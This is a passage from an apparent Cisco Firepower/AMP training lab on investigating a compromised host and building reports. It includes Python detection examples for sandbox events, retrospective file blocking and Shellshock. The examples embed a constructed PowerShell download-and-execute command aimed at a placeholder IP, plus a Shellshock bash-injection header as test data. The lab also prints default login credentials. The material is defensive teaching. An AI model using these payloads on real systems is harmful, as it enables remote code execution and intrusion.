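# Constructed payload of the kind a malicious macro runs; 198.19.19.1 is a placeholder, not a lab host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.19.19.1/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed sandbox events, modelled on the lab's Dynamic Analysis Summary (not real sandbox output).
SAMPLE_EVENTS = [
    {"type": "process", "parent": "EXCEL.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"type": "network", "process": "EXCEL.EXE", "dst": "203.0.113.7", "port": 443},
    {"type": "dns", "process": "powershell.exe", "query": "qx7v1kd.example", "rcode": "NXDOMAIN"},
    {"type": "dns", "process": "powershell.exe", "query": "m2p8ztb.example", "rcode": "NXDOMAIN"},
    {"type": "dns", "process": "powershell.exe", "query": "r9ycq0e.example", "rcode": "NXDOMAIN"},
    {"type": "dns", "process": "powershell.exe", "query": "www.example.com", "rcode": "NOERROR"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events):
    """Return (threat_score, indicators) for a list of sandbox events."""
    indicators = {}
    nxdomain = Counter()
    for ev in events:
        if ev["type"] == "process":
            if ev["parent"].upper() in OFFICE_APPS and ev["image"].lower() in SHELLS:
                indicators["office_spawns_shell"] = f'{ev["parent"]} -> {ev["image"]}'
            decoded = decode_encoded_command(ev.get("cmdline", ""))
            if decoded is not None:
                indicators["encoded_powershell"] = decoded
        elif ev["type"] == "network" and ev["process"].upper() in OFFICE_APPS:
            indicators["office_network"] = f'{ev["process"]} -> {ev["dst"]}:{ev["port"]}'
        elif ev["type"] == "dns" and ev["rcode"] == "NXDOMAIN":
            nxdomain[ev["query"]] += 1
    # A handful of NXDOMAIN answers in one run looks like a DGA or a dead C2 domain.
    if sum(nxdomain.values()) >= NXDOMAIN_THRESHOLD:
        indicators["nxdomain_burst"] = sorted(nxdomain)
    score = min(100, sum(WEIGHTS[name] for name in indicators))
    return score, indicators


if __name__ == "__main__":
    score, found = analyse(SAMPLE_EVENTS)
    print(f"threat score: {score}")
    for name, detail in found.items():
        print(f"  {name}: {detail}")
```

Decoding the -EncodedCommand argument is the step worth doing by hand during an investigation: the base64 hides the download URL and the execution primitive (IEX) from a casual look at the process tree.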


NOTE: Once the AMP cloud has changed the file's disposition to malware, the same file (matched by its SHA-256 hash) is blocked
immediately by every security product that consults that intelligence (other Cisco NGFWs, Web Security Appliances, Email Security
Appliances and AMP for Endpoints).

11. Verify that the same file (Obscene-Salary.xls) is now blocked immediately.

12. Open your remote desktop connection to Workstation A (the one that was initially compromised).

13. Select the link for Download files and try to download it again. The download fails.

Figure 55. Download Failure

NOTE: Depending on the browser, the file may be partially downloaded, but it is no longer a threat.
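The sequence just verified (allowed while unknown, convicted later, blocked on the next transfer) is what retrospection means in practice. The following added example (not Firepower or AMP code; the class and its API are invented for this illustration) keeps a file trajectory keyed by SHA-256 exactly as the NOTE after Figure 52 describes, re-evaluates it when a cloud verdict changes, and blocks the next transfer of the same hash. The file bytes and the source address 203.0.113.7 are constructed; 198.19.19.38 is the compromised host from this scenario.

```python
import hashlib
from collections import defaultdict


class FileDispositionTracker:
    """Record every file transfer by SHA-256 and re-evaluate when the cloud
    disposition changes (retrospection). Illustrative only, not AMP's real logic."""

    def __init__(self):
        self.dispositions = {}               # sha256 -> "unknown" | "clean" | "malware"
        self.trajectory = defaultdict(list)  # sha256 -> transfer records, newest last

    def disposition(self, sha256):
        return self.dispositions.get(sha256, "unknown")

    def on_transfer(self, data, src, dst, name):
        """Called for every file seen on the wire. Returns the action taken."""
        sha256 = hashlib.sha256(data).hexdigest()
        verdict = self.disposition(sha256)
        action = "block" if verdict == "malware" else "allow"
        # Recorded regardless of disposition, so a later verdict can be mapped
        # back to every host that already received the file.
        self.trajectory[sha256].append(
            {"src": src, "dst": dst, "name": name, "verdict": verdict, "action": action})
        return action

    def update_disposition(self, sha256, new_verdict):
        """Apply a new cloud verdict. Returns one retrospective event per earlier
        recipient of the file if the verdict just changed to malware, else []."""
        old = self.disposition(sha256)
        self.dispositions[sha256] = new_verdict
        if new_verdict != "malware" or old == "malware":
            return []
        return [
            {"host": rec["dst"], "file": rec["name"], "was": rec["verdict"], "now": new_verdict}
            for rec in self.trajectory[sha256] if rec["action"] == "allow"
        ]


# Constructed bytes standing in for the real Obscene-Salary.xls content.
SAMPLE_FILE = b"constructed stand-in for the Obscene-Salary.xls bytes"


def walk_through():
    """Replay the lab's sequence; returns (first_action, retrospective_events, second_action)."""
    tracker = FileDispositionTracker()
    sha256 = hashlib.sha256(SAMPLE_FILE).hexdigest()
    # 1. First download: no verdict yet, so the file is allowed but recorded.
    first = tracker.on_transfer(SAMPLE_FILE, "203.0.113.7", "198.19.19.38", "Obscene-Salary.xls")
    # 2. Sandbox convicts the file; every earlier recipient gets a retrospective event.
    retro = tracker.update_disposition(sha256, "malware")
    # 3. Same file requested again (step 13): now blocked on the hash alone.
    second = tracker.on_transfer(SAMPLE_FILE, "203.0.113.7", "198.19.19.38", "Obscene-Salary.xls")
    return first, retro, second


if __name__ == "__main__":
    first, retro, second = walk_through()
    print(f"first transfer: {first}")
    print(f"retrospective events: {retro}")
    print(f"second transfer: {second}")
```

The point a practitioner should take from the trajectory is that the block on the second transfer protects only future victims; the retrospective event list is what tells you which hosts already have the file and need to be triaged.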

14. Examine the Intrusion Events associated with the host.


Figure 56. Host Profile

15. Conduct a high level investigation of the intrusion attempt.

NOTE: We can quickly see that this is a high-priority, Impact 2 event (the target host is potentially vulnerable), that the attack was
blocked, that the attacker was the IP address of WorkstationA (a client on the inside), that the victim was the IoT device, and that
the attack was a Bash CGI environment variable injection (a.k.a. Shellshock).

Figure 57. High level Investigation
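The intrusion event above combines two things: a signature match on the request (a bash function definition smuggled into an HTTP header, which is what Shellshock abuses via CGI environment variables) and an impact flag derived from what FMC knows about the target host. The following added example (not Snort or FMC code) does both over constructed HTTP requests: it flags any header value that starts a bash function definition, then assigns a simplified version of the FMC impact levels (1 vulnerable, 2 potentially vulnerable, 3 currently not vulnerable, 4 unknown target) from a constructed host map. The IoT host address 198.19.19.50, the host map contents and the request samples are assumptions made for this illustration.

```python
import re

# Bash parsed "() {" at the start of an environment variable as a function definition (CVE-2014-6271).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed host map, modelled on the lab's Host Profile view. 198.19.19.50 is a placeholder for the IoT device.
HOST_MAP = {
    "198.19.19.38": {"os": "Windows", "services": {"smb"}, "vulns": set()},
    "198.19.19.50": {"os": "Linux", "services": {"http"}, "vulns": set()},
}

# Constructed requests: one benign, one carrying the Shellshock trigger in User-Agent.
BENIGN = "GET /cgi-bin/status HTTP/1.1\r\nHost: iot\r\nUser-Agent: curl/7.47.0\r\n\r\n"
MALICIOUS = ("GET /cgi-bin/status HTTP/1.1\r\nHost: iot\r\n"
             "User-Agent: () { :;}; /bin/bash -c 'echo shellshock'\r\n\r\n")


def parse_request(raw):
    """Minimal HTTP request parser: returns (request_line, {lowercased header: value})."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def detect_shellshock(raw):
    """Return the names of headers whose value carries a bash function-definition prefix."""
    _, headers = parse_request(raw)
    return sorted(name for name, value in headers.items() if SHELLSHOCK_RE.search(value))


def impact_flag(dst_ip, rule_os="Linux", rule_service="http", vuln_id="CVE-2014-6271"):
    """Simplified FMC-style impact level for a rule that targets rule_os/rule_service."""
    host = HOST_MAP.get(dst_ip)
    if host is None:
        return 4  # unknown target: host not in the network map
    if host["os"] != rule_os or rule_service not in host["services"]:
        return 3  # currently not vulnerable: OS or service does not match the rule
    if vuln_id in host["vulns"]:
        return 1  # vulnerable: the host profile lists the vulnerability
    return 2  # potentially vulnerable: right OS and service, vulnerability not confirmed


def assess(raw, src_ip, dst_ip):
    """Return an intrusion-event style record for a request, or None if nothing matched."""
    hits = detect_shellshock(raw)
    if not hits:
        return None
    return {"src": src_ip, "dst": dst_ip, "headers": hits,
            "impact": impact_flag(dst_ip), "action": "block"}


if __name__ == "__main__":
    print(assess(BENIGN, "198.19.19.38", "198.19.19.50"))
    print(assess(MALICIOUS, "198.19.19.38", "198.19.19.50"))
```

The impact flag is why the same signature hit is worth very different amounts of analyst time: the request in this scenario targets a Linux HTTP host, so it lands at Impact 2 as in Figure 57, whereas the identical request aimed at the Windows workstation would be Impact 3.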

16. Note how this mirrors the attack from Scenario 1.


Figure 58. Attack Mirror

NOTE: This intrusion event maps to the earlier attack attempt against the IoT device.


17. Check the Security Intelligence Events.

Figure 59. Security Intelligence Events

18. The following displays.

Figure 60. Security Intelligence Events

NOTE: The host is trying to communicate with a host in Singapore (SGP). This is, however, blocked by the NGFW.


Conclusion

This concludes the Detection/Analysis exercise. To summarize:

We noticed a host (WorkstationA) which had several Indications of Compromise.

We first examined the host information, which told us the operating system, applications etc. It also told us that the user logged
on to the host at the time of the event was mordiac, a domain admin.

Investigating the malware events showed us that this host had received an Excel file from a server in China. This file was
retrospectively convicted, meaning that at first its disposition was unknown and it was allowed into the network, but at a later
stage Firepower changed the verdict to malware.

The dynamic analysis of this file also told us the nature of the file: a macro launching PowerShell.
Complementary analysis from VirusTotal or Threat Grid would have shown that this was zero-day malware.

We also learned that WorkstationA had been attacking the critical IoT server. This attack was, however, blocked by the IPS.

We also learned that WorkstationA was communicating with a known CnC in Singapore (though this traffic is blocked).


Scenario 4. Reporting
In this scenario, we will focus on the FMC Dashboards and Reporting. FMC allows for very rich and customizable data analysis
and reporting. In the short time available we will only touch on this subject briefly.

Steps
1. From the Workstation, open the Firefox browser and logon to fmc (https://fmc), using username: dcloud and password:
C1sco12345.

2. Select Overview->Dashboards->Summary Dashboard.

NOTE: There are many different predefined dashboards (Files, Security Intelligence and many more). Each dashboard
also has different tabs (for example Network, Threat, Intrusion Events etc).

3. Click the Threats tab.

Figure 61. Summary Dashboards

NOTE: The dashboards serve both as a graphical overview and as the basis for on-demand or scheduled reports, and you can drill
into the underlying analysis by clicking any link in a widget. For example, clicking the CnC link under Connections by Security
Intelligence shows the details of the Security Intelligence events (reputation-based drops of connections to CnC servers).


Figure 62. CnC Link

4. You can Export/Import or create your own dashboard by selecting Overview->Dashboards->Management.

5. Click Create Dashboard.

Figure 63. Create Dashboard


6. Base the new dashboard on a copy of the Summary Dashboard we just examined. Name your new dashboard and click Create.

Figure 64. Create Dashboard

7. On the new dashboard, click Add Widget.

Figure 65. Add Widget


8. Select Custom Analysis. This very flexible widget allows us to display data from any table, with extensive customization.

Figure 66. Custom Analysis

9. Customize the new widget by first clicking the top-left corner, then adjusting the Table (as an example, pick the correlation
events), then picking which field you want to display and any search criteria.

NOTE: Depending on the correlation policy, it is for example very easy to show users in quarantine, or users with a high number of
NXDOMAIN responses.

Figure 67. Customizing a Widget


10. You can convert your (customized) dashboard into a report template. Click Report Designer at the top right of the dashboard.

Figure 68. Report Designer

11. This brings you to the Report Template designer, which starts from your current dashboard structure but still lets you
modify the report: adding text and a logo, switching between bar charts, pie charts and other graphs, etc.

12. When you have finished, click Save and then Generate to produce your report.

Figure 69. Save Report Template

13. When generating the report, make sure to select HTML output (the workstation has no PDF reader).


Figure 70. Select HTML Output

14. View the report by clicking the HTML zip.

Conclusion

This concludes the Reporting exercise. To summarize:

We learned how to produce and customize reports.
